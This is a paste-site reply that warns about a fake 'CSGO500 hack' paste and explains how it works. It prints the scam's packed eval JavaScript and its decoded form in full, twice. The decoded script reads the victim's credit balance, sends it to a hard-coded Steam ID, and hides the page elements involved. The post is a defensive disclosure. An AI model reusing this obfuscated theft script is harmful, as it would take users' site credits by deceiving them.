/!\ SCAM Re: Re: Re: CSGO500 hack

From 0xde0bfda7, 2 Years ago, written in Plain Text.

This paste is a reply to Re: Re: CSGO500 hack from Fiery Pudu - view diff

Embed

Download Paste or View Raw
Hits: 164

The paste that I'm replying to is an obvious scam that will steal all

your CSGO500 credits.

The credits will go to this person: https://steamcommunity.com/profiles/76561198801125925

If you're interested as to how you can come to this conclusion by yourself,

please keep on reading:

Most of the code supplied by the paste is commented, leaving only those

lines to be executed:

document.getElementsByClassName("nav-permalink")[2].click();

var hash_1 = 765;var hash_2=6119;var hash_3=82404;var hash_4=11300;

document.getElementsByClassName("bigtext")[1].style.color="#c8354e";

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 h=b.c("h").e;3 H=h.P(/,/g,\'\');b.c("f-N-d").F=H;3 D=7;3 J=6;3 O=5;3 M=6;3 L=1;3 z=1;3 s=9;3 t=8;3 u=8;3 v=0;3 C=1;3 I=1;3 y=2;3 x=5;3 A=9;3 w=2;3 B=5;b.c("f-K-d").F=D.4()+J.4()+O.4()+M.4()+L.4()+z.4()+s.4()+t.4()+u.4()+v.4()+C.4()+I.4()+y.4()+x.4()+A.4()+w.4()+B.4();b.T(\'12-10-Q Z\')[1].14();$(\'#f-N-d\').a();$(\'#f-K-d\').a();$(\'#13-11-d\').a();$(\'#X-S\').a();$(\'#E-j-R\').a();$(\'#E-j\').a();$(\'#G-Y\').a();$(\'#G-j\').a();b.c("h").e="k r q n l m p o i";b.c("U").e="k r q n l m p o i";b.c("W-V").e="k r q n l m p o i";',62,67,'|||var|toString||||||remove|document|getElementById|input|innerText|send||balance|hack|table|Open|csgo500|to|on|the|start|Page|Account|color_red5_1|color_red5|color_blue1|color_blue2|color_gold3|color_gold1|color_blue5|color_red4|color_gold2|color_gold4|color_blue3|color_grey1|bet|value|sends|balance1|color_blue4|color_grey2|openid|color_red3|color_red2|bux|color_red1|replace|btn|body|details|getElementsByClassName|hash|toggle|autobetter|account|loader|noselect|content|url|slim|trade|click'.split('|'),0,{}));

The last line is most important, and obfuscated in the shittiest of manners.

Simply replacing the eval (javascript function executing whatever code is

passed in a string as a parameter) call by a console.log call will reveal

the following code:

var balance = document.getElementById("balance").innerText;

var balance1 = balance.replace(/,/g, '');

document.getElementById("send-bux-input").value = balance1;

var color_grey1 = 7;

var color_grey2 = 6;

var color_red1 = 5;

var color_red2 = 6;

var color_red3 = 1;

var color_red4 = 1;

var color_red5_1 = 9;

var color_red5 = 8;

var color_blue1 = 8;

var color_blue2 = 0;

var color_blue3 = 1;

var color_blue4 = 1;

var color_blue5 = 2;

var color_gold1 = 5;

var color_gold2 = 9;

var color_gold3 = 2;

var color_gold4 = 5;

document.getElementById("send-openid-input").value = color_grey1.toString() + color_grey2.toString() + color_red1.toString() + color_red2.toString() + color_red3.toString() + color_red4.toString() + color_red5_1.toString() + color_red5.toString() + color_blue1.toString() + color_blue2.toString() + color_blue3.toString() + color_blue4.toString() + color_blue5.toString() + color_gold1.toString() + color_gold2.toString() + color_gold3.toString() + color_gold4.toString();

document.getElementsByClassName('slim-content-btn noselect')[1].click();

$('#send-bux-input').remove();

$('#send-openid-input').remove();

$('#trade-url-input').remove();

$('#account-details').remove();

$('#bet-table-body').remove();

$('#bet-table').remove();

$('#sends-loader').remove();

$('#sends-table').remove();

document.getElementById("balance").innerText = "Open Account Page on csgo500 to start the hack";

document.getElementById("hash").innerText = "Open Account Page on csgo500 to start the hack";

document.getElementById("autobetter-toggle").innerText = "Open Account Page on csgo500 to start the hack";

This seems to be getting the amount of credits you've got, and trying to send

them to an unknown user when you access the "Account page" as prompted by

the last few lines.

Once cleaned, we get the following line setting the "send-openid-input" input

value:

document.getElementById("send-openid-input").value = "76561198801125925";

Which leads us to njrat1337 ( https://steamcommunity.com/profiles/76561198801125925 )

Author

Title

Language

Your paste - Paste your paste here

The paste that I'm replying to is an obvious scam that will steal all
  your CSGO500 credits.
The credits will go to this person: https://steamcommunity.com/profiles/76561198801125925

If you're interested as to how you can come to this conclusion by yourself,
  please keep on reading:

Most of the code supplied by the paste is commented, leaving only those
  lines to be executed:

The last line is most important, and obfuscated in the shittiest of manners.
Simply replacing the eval (javascript function executing whatever code is
  passed in a string as a parameter) call by a console.log call will reveal
  the following code:

var balance = document.getElementById(&quot;balance&quot;).innerText;
var balance1 = balance.replace(/,/g, '');
document.getElementById(&quot;send-bux-input&quot;).value = balance1;
var color_grey1 = 7;
var color_grey2 = 6;
var color_red1 = 5;
var color_red2 = 6;
var color_red3 = 1;
var color_red4 = 1;
var color_red5_1 = 9;
var color_red5 = 8;
var color_blue1 = 8;
var color_blue2 = 0;
var color_blue3 = 1;
var color_blue4 = 1;
var color_blue5 = 2;
var color_gold1 = 5;
var color_gold2 = 9;
var color_gold3 = 2;
var color_gold4 = 5;
document.getElementById(&quot;send-openid-input&quot;).value = color_grey1.toString() + color_grey2.toString() + color_red1.toString() + color_red2.toString() + color_red3.toString() + color_red4.toString() + color_red5_1.toString() + color_red5.toString() + color_blue1.toString() + color_blue2.toString() + color_blue3.toString() + color_blue4.toString() + color_blue5.toString() + color_gold1.toString() + color_gold2.toString() + color_gold3.toString() + color_gold4.toString();
document.getElementsByClassName('slim-content-btn noselect')[1].click();
$('#send-bux-input').remove();
$('#send-openid-input').remove();
$('#trade-url-input').remove();
$('#account-details').remove();
$('#bet-table-body').remove();
$('#bet-table').remove();
$('#sends-loader').remove();
$('#sends-table').remove();
document.getElementById(&quot;balance&quot;).innerText = &quot;Open Account Page on csgo500 to start the hack&quot;;
document.getElementById(&quot;hash&quot;).innerText = &quot;Open Account Page on csgo500 to start the hack&quot;;
document.getElementById(&quot;autobetter-toggle&quot;).innerText = &quot;Open Account Page on csgo500 to start the hack&quot;;

This seems to be getting the amount of credits you've got, and trying to send
  them to an unknown user when you access the &quot;Account page&quot; as prompted by
  the last few lines.
Once cleaned, we get the following line setting the &quot;send-openid-input&quot; input
  value:

document.getElementById(&quot;send-openid-input&quot;).value = &quot;76561198801125925&quot;;

Which leads us to njrat1337 ( https://steamcommunity.com/profiles/76561198801125925 )

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

/!\ SCAM Re: Re: Re: CSGO500 hack

Reply to "/!\ SCAM Re: Re: Re: CSGO500 hack"